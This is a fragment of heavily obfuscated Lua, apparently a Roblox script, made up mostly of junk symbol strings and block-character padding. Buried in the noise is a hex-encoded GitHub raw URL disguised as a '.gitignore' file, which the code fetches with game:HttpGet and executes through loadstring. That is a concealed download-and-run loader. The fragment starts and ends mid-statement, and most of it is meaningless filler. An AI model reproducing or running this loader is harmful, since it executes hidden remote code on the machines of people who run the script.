'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13')local i=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))local j=[[\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x56\x61\x6E\x69\x73\x32\x35\x32\x2F\x76\x61\x6C\x69\x61\x6E\x74\x64\x68\x78\x64\x2F\x6D\x61\x69\x6E\x2F\x2E\x67\x69\x74\x69\x67\x6E\x6F\x72\x65]]j=j:gsub("\\x(%x%x)",function(k)return string.char(tonumber(k,16))end)local f=table.pack('\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\12'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12')pcall(loadstring(game:HttpGet(j,true))())break end;break end else repeat local l=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))until d end;break end;local m=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))break end;local n=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@